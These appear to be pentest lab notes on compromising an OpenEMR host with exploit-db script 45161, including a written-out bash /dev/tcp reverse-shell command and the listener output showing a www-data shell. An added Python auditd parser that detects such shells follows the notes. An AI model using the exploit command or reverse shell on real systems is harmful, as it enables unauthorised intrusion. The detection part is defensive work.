7 :80 openemr exploit

# As all exploits need the patient portal, we can enable it via:
# Logged in > Administration > Globals > Portal > Enable Version 2 Onsite Patient Portal
# Tried many exploits for v5.0.1 - didn't work.

# Trying https://www.exploit-db.com/exploits/45161

$ python 45161.py http://192.168.137.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.49.137/445 0>&1'

$ nc -lvnp 445
listening on [any] 445 ...
connect to [192.168.49.137] from (UNKNOWN) [192.168.137.145] 34856
bash: cannot set terminal process group (1411): Inappropriate ioctl for device
bash: no job control in this shell
www-data@APEX:/var/www/openemr/interface/main$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
APEX
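
A detection-side view of the session above, as an added example that is not part of the original notes: it scans auditd SYSCALL/EXECVE records for commands executed as www-data (uid 33) that carry reverse-shell markers such as the `/dev/tcp/` redirection used here. The sample records are constructed, and an audit rule that logs `execve` is assumed.

```python
import re

WEB_UIDS = {"33"}  # www-data on Debian/Ubuntu, as shown by `id` in the session
SUSPICIOUS = re.compile(r"/dev/(tcp|udp)/|\bbash\s+-i\b")
EVENT_ID = re.compile(r"msg=audit\(([\d.]+:\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def decode_arg(value):
    """auditd quotes plain strings and hex-encodes ones with spaces or specials."""
    if value.startswith('"'):
        return value.strip('"')
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value

def find_web_shells(lines):
    """Join SYSCALL and EXECVE records by event id; flag web-uid shell commands."""
    events = {}
    for line in lines:
        m = EVENT_ID.search(line)
        if not m:
            continue
        fields = dict(FIELD.findall(line))
        ev = events.setdefault(m.group(1), {"uid": None, "argv": []})
        if fields.get("type") == "SYSCALL":
            ev["uid"] = fields.get("uid")
        elif fields.get("type") == "EXECVE":
            argc = int(fields.get("argc", 0))
            ev["argv"] = [decode_arg(fields.get(f"a{i}", "")) for i in range(argc)]
    alerts = []
    for event_id, ev in events.items():
        cmd = " ".join(ev["argv"])
        if ev["uid"] in WEB_UIDS and SUSPICIOUS.search(cmd):
            alerts.append((event_id, cmd))
    return alerts

PAYLOAD = "bash -i >& /dev/tcp/192.168.49.137/445 0>&1"  # command from the session
SAMPLE = [  # constructed auditd records, not captured from the target
    'type=SYSCALL msg=audit(1700000000.101:901): syscall=59 success=yes pid=2201 auid=4294967295 uid=33 gid=33 comm="sh" exe="/bin/dash"',
    'type=EXECVE msg=audit(1700000000.101:901): argc=3 a0="sh" a1="-c" a2=' + PAYLOAD.encode().hex().upper(),
    'type=SYSCALL msg=audit(1700000000.300:902): syscall=59 success=yes pid=2210 auid=4294967295 uid=33 gid=33 comm="php" exe="/usr/bin/php"',
    'type=EXECVE msg=audit(1700000000.300:902): argc=2 a0="php" a1="-v"',
    'type=SYSCALL msg=audit(1700000000.500:903): syscall=59 success=yes pid=2300 auid=1000 uid=0 gid=0 comm="bash" exe="/bin/bash"',
    'type=EXECVE msg=audit(1700000000.500:903): argc=2 a0="bash" a1="-i"',
]

if __name__ == "__main__":
    for event_id, cmd in find_web_shells(SAMPLE):
        print(f"ALERT {event_id}: web uid ran: {cmd}")
```
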
